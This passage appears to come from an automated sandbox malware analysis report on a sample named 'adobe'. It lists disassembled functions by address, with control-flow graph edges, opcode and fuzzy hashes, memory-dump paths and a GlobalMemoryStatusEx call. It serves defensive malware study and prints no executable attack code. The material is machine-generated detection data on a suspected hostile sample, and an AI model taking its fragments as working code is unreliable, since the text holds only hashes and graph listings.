                                                  • Opcode ID: 5284ad492c16e41eb4cf590baf0e44be736990fa9784b8008a0f7ceccdc0b33e
                                                  • Instruction ID: 6decc6fc34fb9742e5485a51d3e8e5fd503d610ec2170c0d87331c6754e3b877
                                                  • Opcode Fuzzy Hash: 5284ad492c16e41eb4cf590baf0e44be736990fa9784b8008a0f7ceccdc0b33e
                                                  • Instruction Fuzzy Hash: 7E915130B0021A9FDB95EF65D950BAFB7F6BF84304F108569D409EB348EE709D468B92
                                                  Function 06A3CFA0 Relevance: 4.6, Strings: 3, Instructions: 802COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 488 6a3cfa0-6a3cfbb 489 6a3cfbd-6a3cfc0 488->489 490 6a3cfc2-6a3d004 489->490 491 6a3d009-6a3d00c 489->491 490->491 492 6a3d055-6a3d058 491->492 493 6a3d00e-6a3d050 491->493 495 6a3d075-6a3d078 492->495 496 6a3d05a-6a3d070 492->496 493->492 498 6a3d0c1-6a3d0c4 495->498 499 6a3d07a-6a3d089 495->499 496->495 503 6a3d0c6-6a3d108 498->503 504 6a3d10d-6a3d110 498->504 500 6a3d08b-6a3d090 499->500 501 6a3d098-6a3d0a4 499->501 500->501 507 6a3d0aa-6a3d0bc 501->507 508 6a3d9bd-6a3d9d0 501->508 503->504 509 6a3d112-6a3d154 504->509 510 6a3d159-6a3d15c 504->510 507->498 523 6a3d9d2-6a3d9dd 508->523 524 6a3d9de-6a3d9f6 508->524 509->510 512 6a3d162-6a3d165 510->512 513 6a3d48c-6a3d498 510->513 517 6a3d167-6a3d1a9 512->517 518 6a3d1ae-6a3d1b1 512->518 513->499 516 6a3d49e-6a3d78b 513->516 703 6a3d9b2-6a3d9bc 516->703 704 6a3d791-6a3d797 516->704 517->518 527 6a3d1b3-6a3d1b8 518->527 528 6a3d1bb-6a3d1be 518->528 523->524 531 6a3d9f8-6a3d9fb 524->531 527->528 529 6a3d1c0-6a3d1cf 528->529 530 6a3d207-6a3d20a 528->530 537 6a3d1d1-6a3d1d6 529->537 538 6a3d1de-6a3d1ea 529->538 541 6a3d253-6a3d256 530->541 542 6a3d20c-6a3d24e 530->542 539 6a3da0a-6a3da0d 531->539 540 6a3d9fd call 6a3db15 531->540 537->538 538->508 545 6a3d1f0-6a3d202 538->545 548 6a3da30-6a3da33 539->548 549 6a3da0f-6a3da2b 539->549 555 6a3da03-6a3da05 540->555 546 6a3d279-6a3d27c 541->546 547 6a3d258-6a3d274 541->547 542->541 545->530 556 6a3d28b-6a3d28e 546->556 557 6a3d27e-6a3d280 546->557 547->546 558 6a3da66-6a3da68 548->558 559 6a3da35-6a3da61 548->559 549->548 555->539 568 6a3d290-6a3d2d2 556->568 569 6a3d2d7-6a3d2da 556->569 566 6a3d347-6a3d350 557->566 567 6a3d286 557->567 570 6a3da6a 558->570 571 6a3da6f-6a3da72 558->571 559->558 577 6a3d352-6a3d357 566->577 578 6a3d35f-6a3d36b 566->578 567->556 568->569 574 6a3d2e9-6a3d2ec 569->574 575 6a3d2dc-6a3d2de 569->575 570->571 571->531 572 6a3da74-6a3da83 571->572 597 6a3da85-6a3dae8 call 6a365e8 572->597 598 6a3daea-6a3daff 572->598 582 6a3d335-6a3d337 574->582 583 6a3d2ee-6a3d330 574->583 580 6a3d2e4 575->580 581 6a3d489 575->581 577->578 589 6a3d371-6a3d385 578->589 590 6a3d47c-6a3d481 578->590 580->574 581->513 593 6a3d339 582->593 594 6a3d33e-6a3d341 582->594 583->582 589->581 603 6a3d38b-6a3d39d 589->603 590->581 593->594 594->489 594->566 597->598 613 6a3db00 598->613 614 6a3d3c1-6a3d3c3 603->614 615 6a3d39f-6a3d3a5 603->615 613->613 626 6a3d3cd-6a3d3d9 614->626 620 6a3d3a7 615->620 621 6a3d3a9-6a3d3b5 615->621 623 6a3d3b7-6a3d3bf 620->623 621->623 623->626 634 6a3d3e7 626->634 635 6a3d3db-6a3d3e5 626->635 638 6a3d3ec-6a3d3ee 634->638 635->638 638->581 639 6a3d3f4-6a3d410 call 6a365e8 638->639 649 6a3d412-6a3d417 639->649 650 6a3d41f-6a3d42b 639->650 649->650 650->590 651 6a3d42d-6a3d47a 650->651 651->581 705 6a3d7a6-6a3d7af 704->705 706 6a3d799-6a3d79e 704->706 705->508 707 6a3d7b5-6a3d7c8 705->707 706->705 709 6a3d9a2-6a3d9ac 707->709 710 6a3d7ce-6a3d7d4 707->710 709->703 709->704 711 6a3d7e3-6a3d7ec 710->711 712 6a3d7d6-6a3d7db 710->712 711->508 713 6a3d7f2-6a3d813 711->713 712->711 716 6a3d822-6a3d82b 713->716 717 6a3d815-6a3d81a 713->717 716->508 718 6a3d831-6a3d84e 716->718 717->716 718->709 721 6a3d854-6a3d85a 718->721 721->508 722 6a3d860-6a3d879 721->722 724 6a3d995-6a3d99c 722->724 725 6a3d87f-6a3d8a6 722->725 724->709 724->721 725->508 728 6a3d8ac-6a3d8b6 725->728 728->508 729 6a3d8bc-6a3d8d3 728->729 731 6a3d8e2-6a3d8fd 729->731 732 6a3d8d5-6a3d8e0 729->732 731->724 737 6a3d903-6a3d91c call 6a365e8 731->737 732->731 741 6a3d92b-6a3d934 737->741 742 6a3d91e-6a3d923 737->742 741->508 743 6a3d93a-6a3d98e 741->743 742->741 743->724
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q
                                                  • API String ID: 0-182748909
                                                  • Opcode ID: 23bc0daf7c8cba55d19a1c1a27db72120e91b8cec37a7bfbfe1c94c35b84417b
                                                  • Instruction ID: aaa1c323856c5601efd81fb96cabd1cf50667154c361192a512318af369441eb
                                                  • Opcode Fuzzy Hash: 23bc0daf7c8cba55d19a1c1a27db72120e91b8cec37a7bfbfe1c94c35b84417b
                                                  • Instruction Fuzzy Hash: 06622D30A0021ACFCB55FF68E590A5DB7A6FF84304B608A69E005DF369DB75ED46CB81
                                                  Function 06A34BB0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 751 6a34bb0-6a34bd4 752 6a34bd6-6a34bd9 751->752 753 6a34bdb-6a34bf5 752->753 754 6a34bfa-6a34bfd 752->754 753->754 755 6a34c03-6a34cfb 754->755 756 6a352dc-6a352de 754->756 774 6a34d01-6a34d4e call 6a3545b 755->774 775 6a34d7e-6a34d85 755->775 757 6a352e0 756->757 758 6a352e5-6a352e8 756->758 757->758 758->752 761 6a352ee-6a352fb 758->761 788 6a34d54-6a34d70 774->788 776 6a34d8b-6a34dfb 775->776 777 6a34e09-6a34e12 775->777 794 6a34e06 776->794 795 6a34dfd 776->795 777->761 791 6a34d72 788->791 792 6a34d7b-6a34d7c 788->792 791->792 792->775 794->777 795->794
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq$\Obq
                                                  • API String ID: 0-4057264190
                                                  • Opcode ID: b6a8295c98e29cb9d3cb6e9da2acb4425762665a22cea791c5b06a1d8f71682e
                                                  • Instruction ID: 39207c179b3a1f3806aca6a74489040c0b6da860bb33f61c77732303f8f1f7a6
                                                  • Opcode Fuzzy Hash: b6a8295c98e29cb9d3cb6e9da2acb4425762665a22cea791c5b06a1d8f71682e
                                                  • Instruction Fuzzy Hash: 7861A130F002199FEB54AFA4C854BAEBBF6FF88700F208029E106EB395DB744C418B91
                                                  Function 06A39188 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1043 6a39188-6a391bd 1045 6a391bf-6a391c2 1043->1045 1046 6a39a80-6a39a83 1045->1046 1047 6a391c8-6a391dd 1045->1047 1048 6a39a85-6a39aa4 1046->1048 1049 6a39aa9-6a39aab 1046->1049 1053 6a391f5-6a3920b 1047->1053 1054 6a391df-6a391e5 1047->1054 1048->1049 1051 6a39ab2-6a39ab5 1049->1051 1052 6a39aad 1049->1052 1051->1045 1056 6a39abb-6a39ac5 1051->1056 1052->1051 1061 6a39216-6a39218 1053->1061 1057 6a391e7 1054->1057 1058 6a391e9-6a391eb 1054->1058 1057->1053 1058->1053 1062 6a39230-6a392a1 1061->1062 1063 6a3921a-6a39220 1061->1063 1074 6a392a3-6a392c6 1062->1074 1075 6a392cd-6a392e9 1062->1075 1064 6a39222 1063->1064 1065 6a39224-6a39226 1063->1065 1064->1062 1065->1062 1074->1075 1080 6a39315-6a39330 1075->1080 1081 6a392eb-6a3930e 1075->1081 1086 6a39332-6a39354 1080->1086 1087 6a3935b-6a39376 1080->1087 1081->1080 1086->1087 1092 6a3939b-6a393a9 1087->1092 1093 6a39378-6a39394 1087->1093 1094 6a393ab-6a393b4 1092->1094 1095 6a393b9-6a39433 1092->1095 1093->1092 1094->1056 1101 6a39480-6a39495 1095->1101 1102 6a39435-6a39453 1095->1102 1101->1046 1106 6a39455-6a39464 1102->1106 1107 6a3946f-6a3947e 1102->1107 1106->1107 1107->1101 1107->1102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927
                                                  • Opcode ID: f347f5cc671af4dc257ce76170c8e7ee052b660900797b3a0e801473d4b705a3
                                                  • Instruction ID: a7a6d4eaa2a843b3e0c14273b22f3700229fe06c42f450ab65b0be128f78ec4e
                                                  • Opcode Fuzzy Hash: f347f5cc671af4dc257ce76170c8e7ee052b660900797b3a0e801473d4b705a3
                                                  • Instruction Fuzzy Hash: C8517130B001169FDB95EB74D990BAFB7F6EF88300F108469D409DB388EE709C468B91
                                                  Function 06A34BA0 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1110 6a34ba0-6a34bd4 1112 6a34bd6-6a34bd9 1110->1112 1113 6a34bdb-6a34bf5 1112->1113 1114 6a34bfa-6a34bfd 1112->1114 1113->1114 1115 6a34c03-6a34cfb 1114->1115 1116 6a352dc-6a352de 1114->1116 1134 6a34d01-6a34d4e call 6a3545b 1115->1134 1135 6a34d7e-6a34d85 1115->1135 1117 6a352e0 1116->1117 1118 6a352e5-6a352e8 1116->1118 1117->1118 1118->1112 1121 6a352ee-6a352fb 1118->1121 1148 6a34d54-6a34d70 1134->1148 1136 6a34d8b-6a34dfb 1135->1136 1137 6a34e09-6a34e12 1135->1137 1154 6a34e06 1136->1154 1155 6a34dfd 1136->1155 1137->1121 1151 6a34d72 1148->1151 1152 6a34d7b-6a34d7c 1148->1152 1151->1152 1152->1135 1154->1137 1155->1154
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fbq$XPbq
                                                  • API String ID: 0-2292610095
                                                  • Opcode ID: 1e531a2aa725da7ae05803b7d6c69d900ceb550e1202e3f61de754ae22fb1e30
                                                  • Instruction ID: 12d44cc18ca2972cd1ab18d95bc67c630e1fd234b28595a5ef0f01933e61cce4
                                                  • Opcode Fuzzy Hash: 1e531a2aa725da7ae05803b7d6c69d900ceb550e1202e3f61de754ae22fb1e30
                                                  • Instruction Fuzzy Hash: 09516F30E002199FDB549FE5C855B9EBAF6FF88740F208429E106EB395DB748C419B91
                                                  Function 0125ED40 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1338 125ed40-125ed5b 1339 125ed85-125ed9b 1338->1339 1340 125ed5d-125ed84 1338->1340 1360 125ed9d call 125ed40 1339->1360 1361 125ed9d call 125ee28 1339->1361 1343 125eda2-125eda4 1344 125eda6-125eda9 1343->1344 1345 125edaa-125ee09 1343->1345 1352 125ee0f-125ee9c GlobalMemoryStatusEx 1345->1352 1353 125ee0b-125ee0e 1345->1353 1356 125eea5-125eecd 1352->1356 1357 125ee9e-125eea4 1352->1357 1357->1356 1360->1343 1361->1343
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2241208324.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1250000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6a8f4094b78673708363d823566a82a6a2fbaade59246fdd75fea1ae8039648c
                                                  • Instruction ID: 8a13c68b07ebbd56d572bccc0e9c9dff437aa083b4d938515674d3d45d7e7f55
                                                  • Opcode Fuzzy Hash: 6a8f4094b78673708363d823566a82a6a2fbaade59246fdd75fea1ae8039648c
                                                  • Instruction Fuzzy Hash: 5C412271D1035A8FCB14DFA9D8446EEFBF5AF89310F058A6AD908E7241DB789941CBD0
                                                  Function 0125EE28 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1441 125ee28-125ee9c GlobalMemoryStatusEx 1443 125eea5-125eecd 1441->1443 1444 125ee9e-125eea4 1441->1444 1444->1443
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0125EE8F
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2241208324.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1250000_adobe.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 7100969036d63aae961c781629f59657b34042044dcb8c61dfb44073579d8a19
                                                  • Instruction ID: 191aadcd898dd33133dc3843506b1b1987f71fbafcfad3ee79707550f6cef03a
                                                  • Opcode Fuzzy Hash: 7100969036d63aae961c781629f59657b34042044dcb8c61dfb44073579d8a19
                                                  • Instruction Fuzzy Hash: DE111FB1C1065A9BCB10DF9AC844B9EFBF4EF48320F11812AD918A7240D378AA44CFA1
                                                  Function 06A3DB15 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: d8127d67e2f83aca273656aaded69c8d5c068cad405631c9ab0267663ff2e8e1
                                                  • Instruction ID: 36df2cef279ebfe6d06d63cf3fd3c8497905f05b0ab776e4208dfc5f327a5ae7
                                                  • Opcode Fuzzy Hash: d8127d67e2f83aca273656aaded69c8d5c068cad405631c9ab0267663ff2e8e1
                                                  • Instruction Fuzzy Hash: 5341BF70E10219DFDB95FF75D89069EBBB2BF85340F104929E405EB240EBB4A846CB81
                                                  Function 06A32200 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: c7975ed310b36d7b3c0ecd6183a09bbd3edaf10a33cf13ed25de6f5e31f4a08f
                                                  • Instruction ID: 4a93a49dd6ac7fe542b0edf0931eec49bcd860cad96929a1e3b914b6f21a7103
                                                  • Opcode Fuzzy Hash: c7975ed310b36d7b3c0ecd6183a09bbd3edaf10a33cf13ed25de6f5e31f4a08f
                                                  • Instruction Fuzzy Hash: AF31F030B002158FDB58ABB4DA5476E7AE6AF89300F208478E406DB394EF75DE46CB95
                                                  Function 06A321ED Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q
                                                  • API String ID: 0-3168235125
                                                  • Opcode ID: 83809b563da47d5385828ab3e5afc269016322e206d4c12dc37b07a4cc9b1be7
                                                  • Instruction ID: 0c7a46ef449a67241628112dd881d9281d6110357c5274d81cb11391dd6dd881
                                                  • Opcode Fuzzy Hash: 83809b563da47d5385828ab3e5afc269016322e206d4c12dc37b07a4cc9b1be7
                                                  • Instruction Fuzzy Hash: 0D31DF31B002118FDB98ABB0DA5472E77B2AF84250F248468E406DF394EF38CE42CB91
                                                  Function 06A34A99 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Obq
                                                  • API String ID: 0-2878401908
                                                  • Opcode ID: 3ab34cc39a5e9bb0dba6ce0f90ccf9803297662b7378139d886a9cb13daae340
                                                  • Instruction ID: 8191716a98ef97de2b7f6a082b62333364bc41ac26cc1df4d6277c98730ac788
                                                  • Opcode Fuzzy Hash: 3ab34cc39a5e9bb0dba6ce0f90ccf9803297662b7378139d886a9cb13daae340
                                                  • Instruction Fuzzy Hash: 8AF0DA31E50129DBDB14EF94E959BAEBBB2FF88705F204119E002A7294CBB41D41DB81
                                                  Function 06A3277B Relevance: 1.0, Instructions: 1026COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 960e6ec7838739884959614d9ab2f7cc93f775586d54e2c8dee3f63a7fdb9441
                                                  • Instruction ID: 3d3ea44d2763c3e051b25a0bf5aec534ef56cb164b92ab2470c22c45920b5056
                                                  • Opcode Fuzzy Hash: 960e6ec7838739884959614d9ab2f7cc93f775586d54e2c8dee3f63a7fdb9441
                                                  • Instruction Fuzzy Hash: 8D923334A002148FDBA4EB68C584BADBBF2FF45314F5584A9E409AF365DB35ED85CB80
                                                  Function 06A36230 Relevance: .2, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07533f9f2f04c5b1cd81027cffcfe0bc5d946a3973b4de193b03ff93e0ce33d4
                                                  • Instruction ID: efac8b5b8547b8f6683442570f91577b0ef7ec3450b9f248ada2509f2933ee51
                                                  • Opcode Fuzzy Hash: 07533f9f2f04c5b1cd81027cffcfe0bc5d946a3973b4de193b03ff93e0ce33d4
                                                  • Instruction Fuzzy Hash: 8361C071F001214BDF54ABAAC88065FBADBAF94224F154479E80EDB364DEA9DD0287D2
                                                  Function 06A342E3 Relevance: .2, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8c843aaca7b63d7d20dbad5737a22e4703eefa3eea65c206b1a002bc58566db
                                                  • Instruction ID: 7bb041125b46315d806fdafdffb09c5732248cc5e4b5ca00ca6482b3173a92a9
                                                  • Opcode Fuzzy Hash: d8c843aaca7b63d7d20dbad5737a22e4703eefa3eea65c206b1a002bc58566db
                                                  • Instruction Fuzzy Hash: 97812B31B0021A8BDF84EFA5D45479EB7F2EF89304F118429E40AEB394EB75DC468B52
                                                  Function 06A34600 Relevance: .2, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a17fd31291b38ea10d744c7a4e4dfa7f96ead2cd17e7fd3a3e5db1f379f23c6
                                                  • Instruction ID: ccbfe52cde648edee9b0b352a3298dd4d81f92369679f1d9fe05c440d55f7252
                                                  • Opcode Fuzzy Hash: 1a17fd31291b38ea10d744c7a4e4dfa7f96ead2cd17e7fd3a3e5db1f379f23c6
                                                  • Instruction Fuzzy Hash: F2914E30E1021A8FDF60DF64C890B9DB7B1FF89300F208599E549AB255DB74AE85CF91
                                                  Function 06A34618 Relevance: .2, Instructions: 210COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 15d7aab4036ef814ddb3c4a879e047df03366b2784f07a8ccb733726efc77188
                                                  • Instruction ID: 8dcc5bf533e1404a58f8db0be4797480dca8407072175cd5a1a6a199f0551f3b
                                                  • Opcode Fuzzy Hash: 15d7aab4036ef814ddb3c4a879e047df03366b2784f07a8ccb733726efc77188
                                                  • Instruction Fuzzy Hash: A1913D30E1061A8BDF60DF68C890BDDB7B1FF89304F208599E549AB255DB70AA85CF91
                                                  Function 06A3EF78 Relevance: .2, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 151bf5be51e5a90bf6acf574e85a40721fcdcb9cfd26f22eea5eb98a603c5583
                                                  • Instruction ID: 95b579148c838a2b3f7dca8a4cb7bd71332f60260ca8d90d3f75a0ce2deea30e
                                                  • Opcode Fuzzy Hash: 151bf5be51e5a90bf6acf574e85a40721fcdcb9cfd26f22eea5eb98a603c5583
                                                  • Instruction Fuzzy Hash: E1713970E102199FCB54EFA9D990AADBBF6FF84300F248429E505EB255DB30ED46CB51
                                                  Function 06A3EF88 Relevance: .2, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ac695362d14fd52aca81f0d1bf01ab49633814ccf23e72295c47f9a2af93d3b
                                                  • Instruction ID: ff0408008e845b607e5439d04d3b8aee0ef09d741679a8996266e1c2ee5590b5
                                                  • Opcode Fuzzy Hash: 8ac695362d14fd52aca81f0d1bf01ab49633814ccf23e72295c47f9a2af93d3b
                                                  • Instruction Fuzzy Hash: DD713870E102199FCB54EFA9D990AADBBF6FF84300F24842AE505EB255DB30ED46CB51
                                                  Function 06A3FC11 Relevance: .2, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bed300d660f55cb41ae04bb5bb56628f255416a7ccc1165d83aeb2b114d748d7
                                                  • Instruction ID: d570f0221e6beddaaa7b9a3130740f6e279e47ac8c9ff41cab70be3aa55c2f5c
                                                  • Opcode Fuzzy Hash: bed300d660f55cb41ae04bb5bb56628f255416a7ccc1165d83aeb2b114d748d7
                                                  • Instruction Fuzzy Hash: 6451DF31E102199FCF54BBA8E8846ADBBB2FF85315F208869E50ADB250DB359C55CB81
                                                  Function 06A3F9C0 Relevance: .2, Instructions: 169COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c915b360b972a39c44cda01a9b12afac6a142da1148aed03e68ba691c0a9e0ff
                                                  • Instruction ID: c9474b27a0eec186557f11a14ce6edf13aad382762aee73aa00e4455bb86f7d0
                                                  • Opcode Fuzzy Hash: c915b360b972a39c44cda01a9b12afac6a142da1148aed03e68ba691c0a9e0ff
                                                  • Instruction Fuzzy Hash: 25516570F203149FEFA46B6DE99472F265EDB89310F204826F40ADB396CA79CC458792
                                                  Function 06A3F9D0 Relevance: .2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b9e191e2de719eb4cbdc073fce835fe9cf45303f6e35836fd9a2ff6cd7a509d4
                                                  • Instruction ID: fcc137dd719b1aa73f5f6a887e4d3ed4f15bd08275e49da62096993be4a4edbf
                                                  • Opcode Fuzzy Hash: b9e191e2de719eb4cbdc073fce835fe9cf45303f6e35836fd9a2ff6cd7a509d4
                                                  • Instruction Fuzzy Hash: 08516770F202149FEFA46B6DD95473F255ED789310F204825F40ADB396CA7DCC458792
                                                  Function 06A355D8 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f4429500b685709b6c01bfc1cd6a0dc205b1e53a108eeb15c9c2deac69a520f
                                                  • Instruction ID: c267752350b3115e28351595b0c032f4a3e109331f2fe08698fc9f0b3a4ec84f
                                                  • Opcode Fuzzy Hash: 5f4429500b685709b6c01bfc1cd6a0dc205b1e53a108eeb15c9c2deac69a520f
                                                  • Instruction Fuzzy Hash: 47518E74E002158BDF70AB6DC48077EBBB2EB85310F288829F55ADF281C775D881CB91
                                                  Function 06A3545B Relevance: .1, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
